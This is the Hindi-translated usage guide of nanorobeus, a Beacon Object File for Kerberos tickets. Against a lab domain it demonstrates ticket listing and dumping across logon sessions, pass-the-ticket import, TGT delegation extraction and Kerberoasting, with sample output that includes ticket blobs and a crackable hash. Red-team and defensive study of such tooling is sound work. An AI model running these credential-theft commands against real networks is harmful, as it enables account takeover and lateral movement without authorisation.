
Kerberos टिकटों के प्रबंधन के लिए COFF फ़ाइल (BOF)।
Kerberos टिकटों के प्रबंधन के लिए COFF फ़ाइल (BOF)।
luid - वर्तमान लॉगन आईडी प्राप्त करें
sessions [/luid:<0x0>| /all] - लॉगन सत्र प्राप्त करें
klist [/luid:<0x0> | /all] - Kerberos टिकटों की सूची बनाएं
dump [/luid:<0x0> | /all] - Kerberos टिकटों को डंप करें
ptt /ticket:<base64> [/luid:<0x0>] - Kerberos टिकट को लॉगन सत्र में आयात करें
purge [/luid:<0x0>] - Kerberos टिकटों को purge करें
tgtdeleg /spn:<spn> - वर्तमान उपयोगकर्ता के लिए उपयोग योग्य TGT प्राप्त करें
kerberoast /spn:<spn> - निर्दिष्ट SPN के विरुद्ध Kerberoasting करें
वर्तमान लॉगन आईडी प्राप्त करें।
=> nanorobeus64 luid
[+] Current LogonId: 0:0x19ea88e
वर्तमान लॉगन सत्र के बारे में विस्तृत जानकारी प्राप्त करें।
=> nanorobeus64 sessions
UserName : User
Domain : FORTRESS
LogonId : 0:0x19ea88e
Session : 2
UserSID : S-1-5-21-1768674056-2740991423-664180583-1105
Authentication package : Kerberos
LogonType : Interactive
LogonTime (UTC) : 2/7/2022 19:22:43
LogonServer : SERVER
LogonServerDNSDomain : FORTRESS.LOCAL
UserPrincipalName : [email protected]
वर्तमान लॉगन सत्र के लिए Kerberos टिकटों की सूची बनाएं। उन्नत विशेषाधिकारों के साथ, सभी सत्रों से टिकट सूचीबद्ध करने के लिए /all या निर्दिष्ट लॉगन सत्र में टिकट सूचीबद्ध करने के लिए /luid:0x0 का उपयोग करें।
=> nanorobeus64 klist
UserName : User
Domain : FORTRESS
LogonId : 0:0x19ea88e
Session : 2
UserSID : S-1-5-21-1768674056-2740991423-664180583-1105
Authentication package : Kerberos
LogonType : Interactive
LogonTime (UTC) : 2/7/2022 19:22:43
LogonServer : SERVER
LogonServerDNSDomain : FORTRESS.LOCAL
UserPrincipalName : [email protected]
[*] Cached tickets: (6)
[0]
Client name : User @ FORTRESS.LOCAL
Server name : krbtgt/FORTRESS.LOCAL @ FORTRESS.LOCAL
Start time : 2/7/2022 19:22:44 (UTC)
End time : 3/7/2022 5:22:43 (UTC)
Renew time : 9/7/2022 19:22:43 (UTC)
Flags : forwardable, forwarded, renewable, pre_authent, name_canonicalize (0x60a10000)
Encryption type : AES256_CTS_HMAC_SHA1
...(snip)...
वर्तमान लॉगन सत्र से टिकट डंप करें। उन्नत विशेषाधिकारों के साथ, सभी सत्रों से टिकट डंप करने के लिए /all या निर्दिष्ट लॉगन सत्र से टिकट डंप करने के लिए /luid:0x0 का उपयोग करें।
=> nanorobeus64 dump
UserName : User
Domain : FORTRESS
LogonId : 0:0x19ea88e
Session : 2
UserSID : S-1-5-21-1768674056-2740991423-664180583-1105
Authentication package : Kerberos
LogonType : Interactive
LogonTime (UTC) : 2/7/2022 19:22:43
LogonServer : SERVER
LogonServerDNSDomain : FORTRESS.LOCAL
UserPrincipalName : [email protected]
[*] Cached tickets: (6)
[0]
Client name : User @ FORTRESS.LOCAL
Server name : krbtgt/FORTRESS.LOCAL @ FORTRESS.LOCAL
Start time : 2/7/2022 19:22:44 (UTC)
End time : 3/7/2022 5:22:43 (UTC)
Renew time : 9/7/2022 19:22:43 (UTC)
Flags : forwardable, forwarded, renewable, pre_authent, name_canonicalize (0x60a10000)
Encryption type : AES256_CTS_HMAC_SHA1
Ticket : doIFFjCCBRKgAwIBBaEDAgEWooIEGTCCBBVhggQRMIIEDaADAg...(snip)...
वर्तमान लॉगन सत्र में एक टिकट आयात करें। उन्नत विशेषाधिकारों के साथ, निर्दिष्ट लॉगन सत्र में टिकट आयात करने के लिए /luid:0x0 का उपयोग करें।
=> make_token network fortress.local test pass
=> nanorobeus64 ptt /ticket:doIFqjCCBaagAwIB...snip...
[+] Ticket successfully imported.
वर्तमान लॉगन सत्र से सभी Kerberos टिकट purge करें। उन्नत विशेषाधिकारों के साथ, निर्दिष्ट लॉगन सत्र से टिकट purge करने के लिए /luid:0x0 का उपयोग करें।
=> nanorobeus64 purge
[+] Successfully purged tickets.
वर्तमान उपयोगकर्ता के लिए उपयोग योग्य TGT प्राप्त करें।
=> nanorobeus64 tgtdeleg /spn:cifs/server.fortress.local
[*] Found the AP-REQ delegation ticket in the GSS-API output
[*] Authenticator etype: AES256_CTS_HMAC_SHA1
[*] Successfully extracted the service ticket session key
[*] Successfully decrypted authenticator
[+] Successfully extracted TGT: doIFeDCCBXSgAwIBBaEDAgEWooIEcjC...(snip)...
SPN निर्दिष्ट करके Kerberoasting करें:
=> nanorobeus64 kerberoast /spn:HTTP/server.fortress.local
[*] Target SPN: HTTP/server.fortress.local
[+] Hash: $krb5tgs$23$*$FORTRESS.LOCAL$HTTP/server.fortress.local*$ac5e2f4d28fd377...(snip)...